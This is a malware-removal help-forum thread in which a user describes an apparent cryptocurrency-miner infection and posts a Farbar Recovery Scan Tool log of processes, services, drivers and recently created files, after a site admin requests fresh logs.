All times are UTC + 1 hour


Post subject: bitcoin miner
Posted: 11 Jan 2019 20:13
Visitor

Joined: 10 Feb 2012 14:30
Posts: 8
Hi,
unfortunately, through my own stupidity I managed to download and install malware, apparently a bitcoin miner.
As soon as I noticed, I immediately ran Malwarebytes Anti-Malware and removed some files. Apparently not everything, though, because the next day after startup the malware blocked the anti-malware, and it also blocks Chrome when I search for other anti-malware tools. So I ran Malwarebytes in safe mode and added AdwCleaner as well. Again it found several files, but the problem persists. I used other anti-malware tools (Hitman Pro), but that did not help. I am asking for advice; I am attaching the logs from Malwarebytes, AdwCleaner and FRST.

Thank you


Attachments:
logy.rar [53.83 KiB]
 
Post subject: Re: bitcoin miner
Posted: 11 Jan 2019 20:53
Site Admin

Joined: 30 Oct 2003 13:42
Posts: 107885
Location: Plzeň
Greetings!
If the FRST+Addition logs were taken before cleaning with AdwCleaner, post these logs again.

_________________
Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.

e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Besides its "visible" activity, a virus can damage the system!

Once your problem is resolved, the thread will be locked. The same applies if it is inactive for more than 14 days. If you want the thread reactivated, write to me at the e-mail address given above.
 
Post subject: Re: bitcoin miner
Posted: 11 Jan 2019 22:45
Visitor

Joined: 10 Feb 2012 14:30
Posts: 8
Sorry, here are the latest logs

Thanks for the prompt reply :)

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28.09.2018
Ran by Martin (administrator) on DESKTOP-VBSMI5O (12-01-2019 00:00:54)
Running from C:\Users\ulol\Desktop
Loaded Profiles: Martin (Available Profiles: defaultuser0 & Martin)
Platform: Windows 10 Home Version 1803 17134.523 (X64) Language: Čeština (Česko)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1812.3-0\MsMpEng.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
(Microsoft Corporation) C:\Windows\HelpPane.exe
() C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4926664 2016-02-26] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [464608 2014-09-08] ()
HKLM-x32\...\Run: [NetTime] => C:\Program Files (x86)\NetTime\NetTime.exe [772096 2012-05-12] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-04] (Advanced Micro Devices, Inc.)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe [160824 2017-05-24] (BlueStack Systems, Inc.)
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {4fc3e674-a3f9-11e8-b924-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec38e4-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec39f6-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {df1b3e25-3b2c-11e8-b912-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f6086f2d-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f608762c-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{430db6d2-4242-4c4a-bd0e-6f4a3369534d}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{942faac3-3e9a-472d-9cf4-c30e16d1a17b}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-195099987-321758953-278711717-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2018-11-22] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2018-12-21] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2018-07-17] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2018-12-21] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: fcg8p7lh.default
FF ProfilePath: C:\Users\ulol\AppData\Roaming\Mozilla\Firefox\Profiles\fcg8p7lh.default [2019-01-12]
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-08-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-08-10] (VideoLAN)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2018-07-17] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2018-07-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-20] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-20] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-12-04] (Adobe Systems Inc.)

Chrome:
=======
CHR HomePage: Default -> hxxp://www.seznam.cz/
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxps://www.google.com/"
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default [2019-01-12]
CHR Extension: (Překladač Google) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-10-20]
CHR Extension: (Dokumenty) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-13]
CHR Extension: (Disk Google) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-01]
CHR Extension: (CLONE, BOUNTY HUNTER, STORM TROOPER) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\bimnpejnapnbhiphakfmkhnnaoemofbe [2017-02-01]
CHR Extension: (YouTube) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-01]
CHR Extension: (Dokumenty Google offline) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-23]
CHR Extension: (AdBlock) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-12-12]
CHR Extension: (Bandzone Downloader) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdolellaicjnehmfidkjkkehmkkapngp [2017-11-09]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-03]
CHR Extension: (Gmail) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-01]
CHR Extension: (Chrome Media Router) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-12-19]
CHR Profile: C:\Users\ulol\AppData\Local\Google\Chrome\User Data\System Profile [2017-11-18]
CHR HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [387128 2017-05-24] (BlueStack Systems, Inc.)
S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-05-24] (BlueStack Systems, Inc.)
S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [406584 2017-05-24] (BlueStack Systems, Inc.)
S2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8522536 2018-12-10] (Microsoft Corporation)
S3 GoogleChromeElevationService; C:\Program Files (x86)\Google\Chrome\Application\71.0.3578.98\elevation_service.exe [443872 2018-12-12] (Google Inc.)
S2 HitmanProScheduler; C:\Program Files\HitmanPro\hmpsched.exe [136512 2019-01-11] (SurfRight B.V.)
S2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2018-11-19] () [File not signed]
S2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [319096 2017-05-18] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6347056 2018-09-19] (Malwarebytes)
S2 NetTimeSvc; C:\Program Files (x86)\NetTime\NetTimeService.exe [473088 2012-05-12] () [File not signed]
S2 Samsung Printer Dianostics Service; C:\WINDOWS\SysWOW64\\spdsvc.exe [499000 2016-07-17] ()
S4 ssh-agent; C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
S2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [256120 2016-02-01] (Synaptics Incorporated)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\NisSrv.exe [3880120 2018-12-11] (Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MsMpEng.exe [114208 2018-12-11] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [23240 2016-02-26] (Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [79736 2017-09-20] (Advanced Micro Devices, Inc.)
S3 Andbus; C:\WINDOWS\System32\drivers\lgandbus64.sys [19456 2012-03-02] (LG Electronics Inc.)
S3 AndDiag; C:\WINDOWS\System32\drivers\lganddiag64.sys [27648 2012-03-02] (LG Electronics Inc.)
S3 AndGps; C:\WINDOWS\System32\drivers\lgandgps64.sys [27136 2012-03-02] (LG Electronics Inc.)
S3 AndNetDiag2; C:\WINDOWS\System32\drivers\lgandnetdiag264.sys [30720 2015-01-26] (LG Electronics Inc.)
S3 AndNetGps; C:\WINDOWS\System32\drivers\lgandnetgps64.sys [29184 2015-01-21] (LG Electronics Inc.)
S3 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2017-05-24] (BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-05-22] (Bluestack System Inc. )
S3 dg_ssudbus; C:\WINDOWS\System32\drivers\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 edrsensor; C:\WINDOWS\System32\DRIVERS\edrsensor.sys [294000 2018-10-09] (BitDefender S.R.L. Bucharest, ROMANIA)
S3 ew_usbccgpfilter; C:\WINDOWS\System32\drivers\ew_usbccgpfilter.sys [18944 2018-11-19] (Huawei Technologies Co., Ltd.)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2019-01-11] ()
U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2018-11-19] (Huawei Technologies Co., Ltd.)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [261032 2019-01-11] (Malwarebytes)
S3 Microsoft_Bluetooth_AvrcpTransport; C:\WINDOWS\system32\DRIVERS\Microsoft.Bluetooth.AvrcpTransport.sys [46592 2018-04-12] (Microsoft Corporation)
R3 RadioHIDMini; C:\WINDOWS\System32\drivers\RadioHIDMini.sys [32168 2015-07-16] (Windows (R) Win 7 DDK provider)
S3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2000-01-01] (Realtek )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2000-01-01] (Realsil Semiconductor Corporation)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [33960 2000-01-01] (Synaptics Incorporated)
S3 ssudcdf; C:\WINDOWS\System32\drivers\ssudcdf.sys [36608 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssuddmgr; C:\WINDOWS\System32\drivers\ssuddmgr.sys [206080 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudobex; C:\WINDOWS\System32\drivers\ssudobex.sys [206080 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64640 2016-07-22] (QUALCOMM Incorporated)
S3 ssudrmnet; C:\WINDOWS\System32\drivers\ssudrmnet.sys [70400 2014-01-22] (DEVGURU Co., LTD.)
S3 ssudserd; C:\WINDOWS\System32\drivers\ssudserd.sys [206080 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ss_conn_usb_driver; C:\WINDOWS\System32\Drivers\ss_conn_usb_driver.sys [26368 2014-01-22] (DEVGURU Co., LTD.)
S3 usbbus; C:\WINDOWS\System32\drivers\lgx64bus.sys [17920 2014-11-17] (LG Electronics Inc.)
S3 UsbDiag; C:\WINDOWS\System32\drivers\lgx64diag.sys [28160 2014-11-21] (LG Electronics Inc.)
S3 UsbGps; C:\WINDOWS\System32\drivers\lgx64gps.sys [27136 2014-11-17] (LG Electronics Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46680 2018-12-11] (Microsoft Corporation)
S0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [330936 2018-12-11] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [62136 2018-12-11] (Microsoft Corporation)
U2 bddci; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-11 23:59 - 2019-01-11 23:59 - 000261032 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2019-01-11 23:24 - 2019-01-11 23:24 - 000012872 _____ (SurfRight B.V.) C:\WINDOWS\system32\bootdelete.exe
2019-01-11 23:07 - 2019-01-11 23:35 - 000055232 _____ C:\WINDOWS\system32\Drivers\hitmanpro37.sys
2019-01-11 23:01 - 2019-01-11 23:02 - 000007593 _____ C:\Users\ulol\AppData\Local\Resmon.ResmonCfg
2019-01-11 22:44 - 2019-01-11 22:44 - 000025200 _____ C:\Users\ulol\Desktop\frst.rar
2019-01-11 20:12 - 2019-01-11 20:12 - 000055127 _____ C:\Users\ulol\Desktop\logy.rar
2019-01-11 20:10 - 2019-01-11 20:12 - 000049304 _____ C:\Users\ulol\Desktop\Addition.txt
2019-01-11 20:07 - 2019-01-12 00:02 - 000015218 _____ C:\Users\ulol\Desktop\FRST.txt
2019-01-11 19:40 - 2019-01-11 19:34 - 000000000 ____D C:\Users\ulol\Desktop\logy
2019-01-11 19:33 - 2019-01-12 00:00 - 000000000 ____D C:\FRST
2019-01-11 19:19 - 2019-01-11 19:19 - 002414080 _____ (Farbar) C:\Users\ulol\Desktop\FRST64.exe
2019-01-11 19:04 - 2019-01-11 19:04 - 000000000 ____D C:\Users\ulol\Desktop\cce_2.5.242177.201_x32
2019-01-11 14:17 - 2019-01-11 14:17 - 000000000 ____D C:\Users\ulol\AppData\Roaming\adaware
2019-01-11 14:17 - 2019-01-11 14:17 - 000000000 ____D C:\Users\ulol\AppData\Local\AdAwareDesktop
2019-01-11 14:13 - 2019-01-11 14:13 - 000000000 ____D C:\Program Files (x86)\adaware
2019-01-11 14:12 - 2019-01-11 14:12 - 000000000 ____D C:\Users\ulol\AppData\Local\AdAwareUpdater
2019-01-11 14:12 - 2019-01-11 14:12 - 000000000 ____D C:\Program Files\Common Files\adaware
2019-01-11 14:11 - 2019-01-11 14:11 - 000000000 ____D C:\ProgramData\adaware
2019-01-11 14:10 - 2019-01-11 23:24 - 000000000 ____D C:\ProgramData\HitmanPro
2019-01-11 14:10 - 2019-01-11 14:10 - 000001958 _____ C:\Users\Public\Desktop\HitmanPro.lnk
2019-01-11 14:10 - 2019-01-11 14:10 - 000000000 ____D C:\Program Files\HitmanPro
2019-01-11 13:46 - 2019-01-11 23:59 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2019-01-11 13:45 - 2019-01-12 00:00 - 000891156 _____ C:\WINDOWS\ntbtlog.txt
2019-01-11 13:34 - 2019-01-11 13:34 - 000000080 ___SH C:\bootTel.dat
2019-01-11 13:25 - 2019-01-11 13:55 - 000000000 ____D C:\AdwCleaner
2019-01-11 13:25 - 2019-01-11 13:25 - 007320272 _____ (Malwarebytes) C:\Users\ulol\Desktop\adwcleaner_7.2.6.0.exe
2019-01-11 11:32 - 2019-01-11 12:13 - 373444054 _____ C:\Users\ulol\Desktop\Vikings 5x17 - S05E17 CZ titulky v obraze.avi
2019-01-11 11:20 - 2019-01-11 11:20 - 006161408 _____ C:\Users\ulol\AppData\Local\dump007.dat
2019-01-11 11:19 - 2019-01-11 11:19 - 000003688 _____ C:\WINDOWS\System32\Tasks\kuaejfar
2019-01-11 11:19 - 2019-01-11 11:19 - 000003470 _____ C:\WINDOWS\System32\Tasks\gcknyzn
2019-01-11 11:19 - 2019-01-11 11:19 - 000000009 _____ C:\Users\ulol\rstr2.ini
2019-01-10 17:53 - 2019-01-10 17:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-01-10 17:53 - 2018-12-04 08:09 - 000152688 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2019-01-10 17:46 - 2019-01-10 17:46 - 000000008 _____ C:\ProgramData\ts.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ C:\ProgramData\lock.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ C:\ProgramData\irw.atsd
2019-01-10 17:29 - 2019-01-10 17:29 - 000003604 _____ C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}
2019-01-10 17:29 - 2019-01-10 17:29 - 000000004 _____ C:\ProgramData\ext.dat
2019-01-10 17:29 - 2019-01-10 17:29 - 000000003 _____ C:\Users\ulol\AppData\Local\wbem.ini
2019-01-10 17:28 - 2019-01-10 17:22 - 000000000 ____D C:\Program Files (x86)\DCOL
2019-01-10 17:26 - 2019-01-10 17:26 - 000000000 ____D C:\Users\ulol\AppData\LocalLow\MAL
2019-01-10 17:12 - 2019-01-10 17:12 - 000057640 _____ C:\ProgramData\agent.uninstall.1547136713.bdinstall.v2.bin
2019-01-09 12:59 - 2019-01-01 14:46 - 012710912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2019-01-09 12:59 - 2019-01-01 14:43 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2019-01-09 12:59 - 2019-01-01 14:20 - 011902976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-01-09 12:59 - 2019-01-01 08:14 - 001221432 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2019-01-09 12:59 - 2019-01-01 08:14 - 001029944 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2019-01-09 12:59 - 2019-01-01 08:14 - 000566568 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2019-01-09 12:59 - 2019-01-01 08:13 - 003292152 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2019-01-09 12:59 - 2019-01-01 08:13 - 001363536 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 009084216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-01-09 12:59 - 2019-01-01 08:12 - 007520104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002765344 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002465792 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002421288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-01-09 12:59 - 2019-01-01 08:12 - 000268304 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2019-01-09 12:59 - 2019-01-01 07:55 - 025856512 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2019-01-09 12:59 - 2019-01-01 07:50 - 022715392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-01-09 12:59 - 2019-01-01 07:50 - 004383744 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2019-01-09 12:59 - 2019-01-01 07:47 - 000808448 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2019-01-09 12:59 - 2019-01-01 07:47 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2019-01-09 12:59 - 2019-01-01 07:45 - 007573504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2019-01-09 12:59 - 2019-01-01 07:45 - 002368512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 001549824 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000894464 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000662528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidprov.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.Workflow.dll
2019-01-09 12:59 - 2019-01-01 07:43 - 001805312 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 004939776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 002247680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 001371136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 000717312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2019-01-09 12:59 - 2019-01-01 07:41 - 001159680 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2019-01-09 12:59 - 2019-01-01 07:41 - 000505344 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 006571584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 002478664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 002253696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 001989040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2019-01-09 12:59 - 2019-01-01 07:29 - 022016512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2019-01-09 12:59 - 2019-01-01 07:22 - 019405312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-01-09 12:59 - 2019-01-01 07:16 - 005775872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2019-01-09 12:59 - 2019-01-01 07:15 - 005307392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2019-01-09 12:59 - 2019-01-01 07:15 - 000608768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2019-01-09 12:59 - 2019-01-01 07:14 - 004514816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2019-01-09 12:59 - 2019-01-01 07:13 - 001628160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-01-09 12:59 - 2019-01-01 07:12 - 000795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2019-01-09 12:59 - 2018-12-19 05:49 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-01-09 12:58 - 2019-01-01 14:50 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2019-01-09 12:58 - 2019-01-01 14:47 - 000225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\windowslivelogin.dll
